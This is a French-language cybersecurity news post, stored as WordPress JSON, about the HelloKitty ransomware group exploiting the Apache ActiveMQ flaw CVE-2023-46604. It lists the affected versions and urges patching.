{"id":999055,"date":"2023-11-02T18:08:53","date_gmt":"2023-11-02T20:08:53","guid":{"rendered":"https:\/\/teknomers.com\/fr\/hellokitty-ransomware-group-exploitant-la-vulnerabilite-apache-activemq\/"},"modified":"2023-11-02T18:08:57","modified_gmt":"2023-11-02T20:08:57","slug":"hellokitty-ransomware-group-exploitant-la-vulnerabilite-apache-activemq","status":"publish","type":"post","link":"https:\/\/teknomers.com\/fr\/hellokitty-ransomware-group-exploitant-la-vulnerabilite-apache-activemq\/","title":{"rendered":"HelloKitty Ransomware Group exploitant la vuln\u00e9rabilit\u00e9 Apache ActiveMQ"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div>\n<p><span class=\"p-author\"><i class=\"icon-font icon-calendar\">\ue802<\/i><span class=\"author\">02 novembre 2023<\/span><i class=\"icon-font icon-user\">\ue804<\/i><span class=\"author\">R\u00e9daction<\/span><\/span><span class=\"p-tags\">Intelligence sur les menaces\/vuln\u00e9rabilit\u00e9<\/span><\/p>\n<\/div>\n<div id=\"articlebody\">\n<div class=\"separator\" style=\"clear: both;\"><a rel=\"nofollow\" href=\"https:\/\/teknomers.com\/fr\/wp-content\/uploads\/2023\/11\/HelloKitty-Ransomware-Group-exploitant-la-vulnerabilite-Apache-ActiveMQ.jpg\" style=\"clear: left; display: block; float: left; text-align: center;\"><\/a><\/div>\n<p>Les chercheurs en cybers\u00e9curit\u00e9 mettent en garde contre l&#8217;exploitation pr\u00e9sum\u00e9e d&#8217;une faille de s\u00e9curit\u00e9 critique r\u00e9cemment r\u00e9v\u00e9l\u00e9e dans le service de courtage de messages open source Apache ActiveMQ, qui pourrait entra\u00eener l&#8217;ex\u00e9cution de code \u00e0 distance.<\/p>\n<p>&#8220;Dans les deux cas, l&#8217;adversaire a tent\u00e9 de d\u00e9ployer des binaires de ransomware sur les syst\u00e8mes cibles dans le but de ran\u00e7onner les organisations victimes&#8221;, a d\u00e9clar\u00e9 la soci\u00e9t\u00e9 de cybers\u00e9curit\u00e9 Rapid7. <a rel=\"nofollow noopener\" href=\"https:\/\/www.rapid7.com\/blog\/post\/2023\/11\/01\/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604\/\" target=\"_blank\">divulgu\u00e9<\/a> dans un rapport publi\u00e9 mercredi.<\/p>\n<p>&#8220;Sur la base de la demande de ran\u00e7on et des preuves disponibles, nous attribuons l&#8217;activit\u00e9 \u00e0 la famille de ransomwares HelloKitty, dont le code source a \u00e9t\u00e9 divulgu\u00e9 sur un forum d\u00e9but octobre.&#8221;<\/p>\n<p>Les intrusions impliqueraient l&#8217;exploitation de <a rel=\"nofollow noopener\" href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-46604\" target=\"_blank\">CVE-2023-46604<\/a>une vuln\u00e9rabilit\u00e9 d&#8217;ex\u00e9cution de code \u00e0 distance dans Apache ActiveMQ qui permet \u00e0 un acteur malveillant d&#8217;ex\u00e9cuter des commandes shell arbitraires.<\/p>\n<div class=\"check_two clear babsi\"><center class=\"cf\"><a rel=\"nofollow noopener\" href=\"https:\/\/thn.news\/wiz-inside-desk\" target=\"_blank\" title=\"Cybersecurity\"><img loading=\"lazy\" decoding=\"async\" class=\"lazyload\" alt=\"La cyber-s\u00e9curit\u00e9\" src=\"https:\/\/teknomers.com\/fr\/wp-content\/uploads\/2023\/11\/Turla-met-a-jour-la-porte-derobee-Kazuar-avec-une.png\" width=\"727\" height=\"90\"\/><\/a><\/center><\/div>\n<p>Il convient de noter que le <a rel=\"nofollow noopener\" href=\"https:\/\/activemq.apache.org\/security-advisories.data\/CVE-2023-46604\" target=\"_blank\">vuln\u00e9rabilit\u00e9<\/a> porte un score CVSS de 10,0, indiquant une gravit\u00e9 maximale.  Il a \u00e9t\u00e9 <a rel=\"nofollow noopener\" href=\"https:\/\/activemq.apache.org\/news\/\" target=\"_blank\">adress\u00e9<\/a> dans les versions ActiveMQ 5.15.16, 5.16.7, 5.17.6 ou 5.18.3 publi\u00e9es \u00e0 la fin du mois dernier.<\/p>\n<p>La vuln\u00e9rabilit\u00e9 affecte les versions suivantes &#8211;<\/p>\n<ul>\n<li>Apache ActiveMQ 5.18.0 avant 5.18.3<\/li>\n<li>Apache ActiveMQ 5.17.0 avant 5.17.6<\/li>\n<li>Apache ActiveMQ 5.16.0 avant 5.16.7<\/li>\n<li>Apache ActiveMQ avant 5.15.16<\/li>\n<li>Apache ActiveMQ Legacy OpenWire Module 5.18.0 avant 5.18.3<\/li>\n<li>Apache ActiveMQ Legacy OpenWire Module 5.17.0 avant 5.17.6<\/li>\n<li>Apache ActiveMQ Legacy OpenWire Module 5.16.0 avant 5.16.7<\/li>\n<li>Apache ActiveMQ Legacy OpenWire Module 5.8.0 avant 5.15.16<\/li>\n<\/ul>\n<p>Depuis la divulgation du bug, une preuve de concept (PoC) <a rel=\"nofollow noopener\" href=\"https:\/\/github.com\/X1r0z\/ActiveMQ-RCE\" target=\"_blank\">exploiter le code<\/a> et <a rel=\"nofollow noopener\" href=\"https:\/\/paper.seebug.org\/3058\/\" target=\"_blank\">sp\u00e9cificit\u00e9s techniques suppl\u00e9mentaires<\/a> ont \u00e9t\u00e9 rendus publics, Rapid7 notant que le comportement observ\u00e9 dans les deux r\u00e9seaux victimes est &#8220;similaire \u00e0 ce que nous attendrions de l&#8217;exploitation de CVE-2023-46604&#8221;.<\/p>\n<div class=\"check_two clear babsi\"><center class=\"cf\"><a rel=\"nofollow noopener\" href=\"https:\/\/thn.news\/pjHvTZON\" target=\"_blank\" title=\"Cybersecurity\"><img loading=\"lazy\" decoding=\"async\" class=\"lazyload\" alt=\"La cyber-s\u00e9curit\u00e9\" src=\"https:\/\/teknomers.com\/fr\/wp-content\/uploads\/2023\/11\/Turla-met-a-jour-la-porte-derobee-Kazuar-avec-une.gif\" width=\"727\" height=\"90\"\/><\/a><\/center><\/div>\n<p>Une exploitation r\u00e9ussie est suivie par la tentative de l&#8217;adversaire de charger des binaires distants nomm\u00e9s M2.png et M4.png \u00e0 l&#8217;aide de Windows Installer (<a rel=\"nofollow noopener\" href=\"https:\/\/learn.microsoft.com\/en-us\/windows-server\/administration\/windows-commands\/msiexec\" target=\"_blank\">msiexec<\/a>).<\/p>\n<p>Les deux fichiers MSI contiennent un ex\u00e9cutable .NET 32 bits nomm\u00e9 dllloader qui, \u00e0 son tour, charge une charge utile cod\u00e9e en Base64 appel\u00e9e EncDLL qui fonctionne comme un ransomware, recherchant et mettant fin \u00e0 un ensemble sp\u00e9cifique de processus avant de commencer le processus de cryptage et d&#8217;ajouter le fichier crypt\u00e9. fichiers avec l&#8217;extension &#8220;.locked&#8221;.<\/p>\n<table cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"float: left;\">\n<tbody>\n<tr>\n<td style=\"text-align: center;\"><a rel=\"nofollow\" href=\"https:\/\/teknomers.com\/fr\/wp-content\/uploads\/2023\/11\/1698955733_84_HelloKitty-Ransomware-Group-exploitant-la-vulnerabilite-Apache-ActiveMQ.jpg\" style=\"clear: left; display: block; margin-left: auto; margin-right: auto; text-align: center;\"><img decoding=\"async\" src=\"https:\/\/teknomers.com\/fr\/wp-content\/uploads\/2023\/11\/1698955733_84_HelloKitty-Ransomware-Group-exploitant-la-vulnerabilite-Apache-ActiveMQ.jpg\" alt=\"HelloKitty Ransomware\" border=\"0\" data-original-height=\"422\" data-original-width=\"728\" title=\"HelloKitty Ransomware\"\/><\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"tr-caption\" style=\"text-align: center;\">Source de l&#8217;image\u00a0: Fondation Shadowserver<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>La Fondation Shadowserver <a rel=\"nofollow noopener\" href=\"https:\/\/www.shadowserver.org\/what-we-do\/network-reporting\/accessible-activemq-service-report\/\" target=\"_blank\">dit<\/a> il a trouv\u00e9 <a rel=\"nofollow noopener\" href=\"https:\/\/dashboard.shadowserver.org\/statistics\/combined\/time-series\/?date_range=7&amp;source=activemq&amp;tag=cve-2023-46604&amp;style=stacked\" target=\"_blank\">3\u00a0326 instances ActiveMQ accessibles sur Internet<\/a> sensibles au CVE-2023-46604 \u00e0 compter du 1er novembre 2023. Une majorit\u00e9 des <a rel=\"nofollow noopener\" href=\"https:\/\/dashboard.shadowserver.org\/statistics\/combined\/map\/?map_type=std&amp;day=2023-10-31&amp;source=activemq&amp;tag=cve-2023-46604&amp;geo=all&amp;data_set=count&amp;scale=log\" target=\"_blank\">serveurs vuln\u00e9rables<\/a> sont situ\u00e9s en Chine, aux \u00c9tats-Unis, en Allemagne, en Cor\u00e9e du Sud et en Inde.<\/p>\n<p>\u00c0 la lumi\u00e8re de l&#8217;exploitation active de la faille, il est recommand\u00e9 aux utilisateurs de mettre \u00e0 jour vers la version corrig\u00e9e d&#8217;ActiveMQ d\u00e8s que possible et d&#8217;analyser leurs r\u00e9seaux \u00e0 la recherche d&#8217;indicateurs de compromission.<\/p>\n<p><\/p>\n<div class=\"cf note-b\">Vous avez trouv\u00e9 cet article int\u00e9ressant ?  Suivez-nous sur <a rel=\"nofollow noopener\" href=\"https:\/\/twitter.com\/thehackersnews\" target=\"_blank\">Twitter <i class=\"icon-font icon-twitter\">\uf099<\/i><\/a>  et <a rel=\"nofollow noopener\" href=\"https:\/\/www.linkedin.com\/company\/thehackernews\/\" target=\"_blank\">LinkedIn<\/a> pour lire plus de contenu exclusif que nous publions.<\/div>\n<\/div>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><br \/>\n<br \/><br \/>\n<br \/><a href=\"https:\/\/thehackernews.com\/2023\/11\/hellokitty-ransomware-group-exploiting.html\" rel=\"nofollow noopener\" target=\"_blank\">ttn-fr-57<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\ue80202 novembre 2023\ue804R\u00e9dactionIntelligence sur les menaces\/vuln\u00e9rabilit\u00e9 Les chercheurs en cybers\u00e9curit\u00e9 mettent en garde contre l&#8217;exploitation pr\u00e9sum\u00e9e d&#8217;une faille de s\u00e9curit\u00e9 critique r\u00e9cemment r\u00e9v\u00e9l\u00e9e dans le service de courtage de messages open source Apache ActiveMQ, qui pourrait entra\u00eener l&#8217;ex\u00e9cution de code \u00e0 distance. &#8220;Dans les deux cas, l&#8217;adversaire a tent\u00e9 de d\u00e9ployer des binaires de ransomware [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":999056,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[212515,200292,43333,4168,4165,4161,200267,29063,4555,212514,4159,4171,200271,200268,200269,200270,4392,128318,4172,4169,4166,3667,4164],"class_list":["post-999055","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-technologie","tag-activemq","tag-actualites-sur-la-cybersecurite","tag-apache","tag-comment-pirater","tag-cyber-attaques","tag-cyber-mises-a-jour","tag-cyberactualites","tag-exploitant","tag-group","tag-hellokitty","tag-lactualite-de-la-cybersecurite-aujourdhui","tag-lactualite-des-hackers","tag-logiciel-malveillant-rancongiciel","tag-mises-a-jour-sur-la-cybersecurite","tag-nouvelles-des-pirates","tag-nouvelles-sur-le-piratage","tag-ransomware","tag-securite-des-informations","tag-securite-informatique","tag-securite-internet","tag-violation-de-donnees","tag-vulnerabilite","tag-vulnerabilite-logicielle"],"_links":{"self":[{"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/posts\/999055","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/comments?post=999055"}],"version-history":[{"count":0,"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/posts\/999055\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/media\/999056"}],"wp:attachment":[{"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/media?parent=999055"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/categories?post=999055"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/tags?post=999055"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}